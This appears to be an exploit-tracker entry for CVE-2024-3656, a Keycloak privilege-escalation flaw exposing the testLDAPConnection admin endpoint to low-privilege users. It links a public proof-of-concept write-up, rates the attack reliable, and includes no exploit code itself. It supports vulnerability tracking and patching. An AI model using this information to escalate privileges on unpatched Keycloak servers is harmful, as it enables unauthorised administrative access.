CVE-2024-3656

HIGH NUCLEI

Keycloak < 24.0.5 - Authenticated Privilege Escalation via Admin REST API Endpoints

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2024-3656. PoCs published by h4x0r-dz. A Nuclei detection template is also available.

AI-analyzed exploit summary This repository provides a detailed technical analysis of CVE-2024-3656, a Broken Access Control vulnerability in Keycloak < 24.0.5. It includes a patch diff analysis, reproduction steps, and HTTP request examples for exploiting the `testLDAPConnection` endpoint.

Description

A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.

Exploits (1)

nomisec WRITEUP 28 stars

by h4x0r-dz · poc

https://github.com/h4x0r-dz/CVE-2024-3656

View Code ZIP pw:eip

This repository provides a detailed technical analysis of CVE-2024-3656, a Broken Access Control vulnerability in Keycloak < 24.0.5. It includes a patch diff analysis, reproduction steps, and HTTP request examples for exploiting the `testLDAPConnection` endpoint.

Classification

Writeup 95%

Attack Type

Auth Bypass

Complexity

Moderate

Reliability

Reliable

Target: Keycloak < 24.0.5

Auth required

Prerequisites: Authenticated user account in Keycloak · Access to the Keycloak admin API

MITRE ATT&CK